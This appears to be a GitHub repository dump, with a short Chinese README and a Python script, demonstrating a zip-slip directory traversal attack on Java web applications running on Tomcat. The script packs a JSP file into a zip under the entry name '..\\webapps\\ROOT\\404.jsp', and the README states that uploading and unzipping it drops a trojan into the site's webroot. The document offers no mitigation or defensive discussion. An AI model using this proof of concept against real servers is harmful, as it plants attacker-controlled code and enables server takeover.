├── README.md
├── test.py
├── test.zip
└── zip.png


/README.md:
--------------------------------------------------------------------------------
 1 | # Java-Compressed-file-security java web 压缩文件 安全 漏洞
 2 | 
 3 | ![](./zip.png)
 4 | 
 5 | 测试环境：
 6 | ```
 7 | Windows For Apache Tomcat/8.5.16
 8 | ```
 9 | 
10 | ## 0x01 制作目录穿越-恶意压缩文件
11 | 
12 | 代码：
13 | 
14 | ```
15 | #coding=utf-8
16 | 
17 | import zipfile  
18 | import sys
19 | 
20 | if __name__ == "__main__":  
21 |     try:
22 |         with open("404.jsp", "r") as f:
23 |             binary = f.read()
24 |             zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
25 |             info = zipfile.ZipInfo("test.zip")
26 |             zipFile.writestr("..\\webapps\\ROOT\\404.jsp", binary)
27 |             zipFile.close()
28 |     except IOError as e:
29 |         raise e
30 | 
31 | ```
32 | 
33 | ## 0x02 文件上传，点击解压缩，木马文件解压到网站webapps目录
34 | 
35 | 
36 | 
37 | 


--------------------------------------------------------------------------------
/test.py:
--------------------------------------------------------------------------------
 1 | #coding=utf-8
 2 | 
 3 | import zipfile  
 4 | import sys
 5 | 
 6 | if __name__ == "__main__":  
 7 |     try:
 8 |         with open("404.jsp", "r") as f:
 9 |             binary = f.read()
10 |             zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
11 |             info = zipfile.ZipInfo("test.zip")
12 |             zipFile.writestr("..\\webapps\\ROOT\\404.jsp", binary)
13 |             zipFile.close()
14 |     except IOError as e:
15 |         raise e
16 | 


--------------------------------------------------------------------------------
/test.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Compressed-file-security/6270c896e6728eeac7de61ab3bb793aa15448889/test.zip


--------------------------------------------------------------------------------
/zip.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Compressed-file-security/6270c896e6728eeac7de61ab3bb793aa15448889/zip.png


--------------------------------------------------------------------------------